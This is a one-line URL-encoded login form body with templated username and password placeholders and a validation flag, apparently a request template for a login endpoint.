_charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
